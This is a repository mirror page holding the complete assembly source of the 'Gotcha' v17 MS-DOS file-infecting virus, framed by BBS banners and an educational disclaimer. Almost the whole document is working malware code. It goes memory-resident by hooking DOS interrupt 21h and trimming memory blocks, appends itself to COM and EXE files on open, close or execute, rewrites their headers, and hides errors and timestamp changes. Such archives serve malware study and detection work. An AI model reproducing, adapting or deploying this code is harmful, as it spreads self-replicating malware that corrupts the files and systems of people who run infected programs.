ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 02:16:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
119ac6d829
MalwareSourceCode/MSDOS/G-Index/Virus.MSDOS.Unknown.gotcha17.asm

504 lines
18 KiB
NASM
Raw Normal View History

re-organize push
2022-08-21 09:07:57 +00:00
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* Gotcha version 17
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
.RADIX 16
cseg segment
assume cs:cseg,ds:cseg,es:nothing
VERSION equ 17d
FILELEN equ end - start
RESPAR equ (FILELEN/16d) + 18d
BUFLEN equ 18
ENVLEN equ signature- envstring
COMSIGN equ 0
EXESIGN equ 1
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 0100
begin: db 0E9, BUFLEN+1, 0 ;jump to virus entry
;****************************************************************************
;* Data
;****************************************************************************
org 0103
start:
buffer db 0CDh, 20 ;original code
db (BUFLEN-2) dup (?)
comexe db COMSIGN ;dummy program is a COM program
;****************************************************************************
;* Install the virus
;****************************************************************************
call start2
start2: pop si
sub si,(BUFLEN+4) ;si = begin virus
mov di,0100
cld
cmp byte ptr cs:[si+BUFLEN],COMSIGN
jz entryC
entryE: mov ax,ds ;calculate CS
add ax,10
add ax,cs:[si+16]
push ax ;push new CS on stack
push cs:[si+14] ;push new IP on stack
jmp short entcheck
entryC: push cs ;push new CS on stack
push di ;push new IP on stack
push di
push si
movsw ;restore old file-begin
movsb
pop si
pop di
entcheck: mov ax,0DADA ;already installed?
int 21
cmp ah,0A5
je entstop
mov ax,3000 ;test DOS version >= 3.1?
int 21
xchg ah,al
cmp ax,030A
jb entstop
push ds
push es
mov ax,ds ;adjust memory-size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5A
jnz cancel
mov ax,ds:[0003]
sub ax,low RESPAR
jb cancel
mov ds:[0003],ax
sub word ptr ds:[0012],low RESPAR
mov es,ds:[0012] ;copy program to top
push cs
pop ds
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,4*21
movsw ;move it to the end
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21-3
mov ax,2521
int 21
cancel: pop es
pop ds
entstop: db 0CBh ;retf
;****************************************************************************
;* Interupt 24 handler
;****************************************************************************
ni24: mov al,3
iret
;****************************************************************************
;* Interupt 21 handler
;****************************************************************************
ni21: pushf
cmp ax,0DADA ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ah,3E ;close ?
jne vvv
mov ah,45 ;duplicate handle
jmp short doit
vvv: cmp ax,4B00 ;execute ?
jne exit
mov ah,3Dh ;open the file
doit: int 21
jc exit
xchg ax,bx
call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
org21: jmp dword ptr cs:[oi21-3] ;call to old int-handler
do_DADA: mov ax,0A500+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Close the file
;****************************************************************************
close: mov ah,3E ;close the file
pushf
push cs
call org21
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
push bx
mov ah,62 ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov es,ds:[002C]
xor di,di
pop bx
push cs
pop ds
envloop: mov si,offset envstring-3 ;check the environment
mov cx,ENVLEN
repz cmpsb
jz close ;exit if item found
dec di ;goto next item
xor al,al
mov ch,0FF
repnz scasb
cmp byte ptr es:[di],0 ;finnished environment?
jnz envloop
mov ax,3300 ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov dx,bx
mov ax,3524 ;get int24 vector
int 21
push bx
push es
mov bx,dx
push cs
pop ds
mov dx,offset ni24 ;set int24 vector
mov ah,25
push ax
int 21
mov ax,1220 ;get file-table entry
push bx
push ax
int 2F
mov bl,es:[di]
pop ax
sub al,0A
int 2F
pop bx
push es
pop ds
push [di+2] ;save attribute & open-mode
push [di+4]
cmp word ptr [di+28],'XE' ;check extension
jne not_exe
cmp byte ptr [di+2A],'E'
jmp short check
not_exe: cmp word ptr [di+28],'OC'
jne close1v
cmp byte ptr [di+2A],'M'
check: je check_name
close1v: jmp close1
check_name: cmp byte ptr [di+20],'V' ;name is V*.* ?
je close1v
cmp byte ptr [di+20],'F' ;name is F*.* ?
je close1v
mov cx,7 ;name is *SC*.* ?
mov ax,'CS'
push di
add di,21
SCloop: dec di
scasw
loopnz SCloop
pop di
je close1v
mov byte ptr [di+2],2 ;open for read/write
mov byte ptr [di+4],0 ;clear attributes
call getlen
mov cl,3
sub ax,cx ;goto signature
sbb dx,0
call goto
push ax ;save old offset
push dx
push cs
pop ds
mov si,0100 ;read signature
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],'!A' ;already infected?
je close2v
call gotobegin
mov cl,BUFLEN ;read begin
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],5A4Dh ;EXE ?
jz do_EXE
cmp word ptr [si],4D5A
jz do_EXE
do_COM: mov byte ptr [si+BUFLEN],COMSIGN
cmp byte ptr es:[di+12],0FC ;check length
jnb close2
cmp byte ptr es:[di+12],3
jbe close2
call writeprog ;write program to end of file
jnz close2
mov byte ptr [si],0E9h ;JMP xxxx'
call getoldlen
add ax,(BUFLEN-2)
mov word ptr [si+1],ax
jmp short done
close2v: jmp short close2
do_EXE: mov byte ptr [si+BUFLEN],EXESIGN
call writeprog ;write program to end of file
jnz close2
call getlen ;calculate new length
mov cx,0200 ;put new length in header
div cx
inc ax
mov word ptr [si+4],ax
mov word ptr [si+2],dx
call getoldlen ;calculate new CS & IP
mov cx,0010
div cx
sub ax,word ptr [si+8]
mov word ptr [si+16],ax ;put CS in header
add dx,BUFLEN+1
mov word ptr [si+14],dx ;put IP in header
done: call gotobegin
mov cx,BUFLEN ;write new begin
mov dx,si
mov ah,40
int 21
close2: push es
pop ds
pop dx ;restore old offset in file
pop ax
call goto
or byte ptr [di+6],40 ;no time-change
close1: call close
or byte ptr [di+5],40 ;no EOF on next close
pop [di+4] ;restore attribute & open-mode
pop [di+2]
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
ret
;****************************************************************************
;* Get original length of program
;****************************************************************************
getoldlen: call getlen
sub ax,FILELEN
sbb dx,0
ret
;****************************************************************************
;* Get length of program
;****************************************************************************
getlen: mov ax,es:[di+11]
mov dx,es:[di+13]
ret
;****************************************************************************
;* Goto new offset DX:AX
;****************************************************************************
gotobegin: xor ax,ax
cwd
goto: xchg ax,es:[di+15]
xchg dx,es:[di+17]
ret
;****************************************************************************
;* Write virus to the file
;****************************************************************************
writeprog: call getlen
call goto
mov cx,FILELEN ;write virus
mov dx,si
mov ah,40
int 21
cmp cx,ax ;are all bytes written?
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring db 'E=mc<6D>',0
signature: db 'GOTCHA!',0 ;I have got you! :-)
oi21:
end:
cseg ends
end begin
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
Reference in New Issue Copy Permalink